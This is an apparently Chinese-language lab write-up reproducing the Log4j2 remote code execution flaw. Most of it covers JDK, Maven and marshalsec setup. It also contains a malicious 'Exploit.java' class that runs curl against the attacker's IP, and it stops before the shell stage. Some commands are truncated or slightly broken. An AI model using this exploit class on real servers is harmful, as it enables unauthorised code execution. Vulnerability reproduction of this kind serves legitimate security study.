apachelog4j2漏洞复现linux【纯详版】本次记录⾃⼰测试时每⼀步操作,很详细。
本次复现分为curl测试和拿shell两种操作,测试完curl后体验时长到期了,只能换环境了。
本次测试环境如下:
curl------------------------------------------------------
攻击机:106.15.47.238(阿⾥云的⼀⼩时体验服务器)
拿shell--------------------------------------------------
靶场:      192.168.11.136(centos7)
攻击机:192.168.11.128(kali)
curl测试:
攻击机-----------------------
安装java环境:
jdk1.8.0_181
下载好后使⽤rz传到vps上:
#yum install lrzsz
#rz
解压缩:
tar -zxvf
Copy到/usr/jdk:
cp -r jdk1.8.0_181/ /usr/jdk
编辑环境变量:
vi /etc/profile
将下⾯配置添加到⽂件最后:
export JAVA_HOME=/usr/jdk
export CLASSPATH=.:$JAVA_HOME/lib:$JAVA_HOME/jre/lib:$CLASSPATH
export PATH=$JAVA_HOME/bin:$JAVA_HOME/jre/bin:$PATH
告诉系统jdk的位置:
update-alternatives --install "/usr/bin/java" "java" "/usr/jdk/bin/java" 1
update-alternatives --install "/usr/bin/javac" "javac" "/usr/jdk/bin/javac" 1 update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/jdk/bin/javaws" 1 update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/jdk/bin/javaws" 1linux安装jdk环境变量
设置新的jdk为默认:
update-alternatives --set java /usr/jdk/bin/java
update-alternatives --set java /usr/jdk/bin/java
update-alternatives --set javac /usr/jdk/bin/javac
update-alternatives --set javac /usr/jdk/bin/javac
update-alternatives --set javaws /usr/jdk/bin/javaws
update-alternatives --set javaws /usr/jdk/bin/javaws
重载profile⽂件:
source /etc/profile
查看jdk版本:
java -version
到此java环境安装完毕。
编写⼀个恶意类,命名为Exploit.java,这⾥⽤curl测试:
vi  Exploit.java
写⼊:
public class Exploit {
public Exploit(){
try{
// 要执⾏的命令
String[] commands = {"curl","106.15.47.238:5678"};
Process pc = Runtime().exec(commands);
pc.waitFor();
} catch(Exception e){
e.printStackTrace();
}
}
public static void main(String[] argv) {
Exploit e = new Exploit();
}
}
编译:
javac Exploit.java
开个http服务,等会⽤来验证是否命令被⽬标执⾏:
安装maven:
wget mirrorsnic/apache/maven/maven-3/3.8.4/binaries/apache-maven-3.8.
解压:
tar -zxvf apache-maven-3.8.
配置:
update-alternatives --install /usr/bin/mvn mvn ~/apache-maven-3.8.4/bin/mvn 1
环境变量配置:
vi /etc/profile
最下⾯添加:
export MAVEN_HOME=~/apache-maven-3.8.4
export PATH=$MAVEN_HOME/bin:$PATH
重载profile⽂件:
source /etc/profile
装git:
yum install git
下载marshalsec⼯具
git clone /mbechler/marshalsec.git
进⼊marshalsec⽂件夹,使⽤maven编译marshalsec成jar包:mvn clean package -DskipTests
耐⼼等待
来了

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。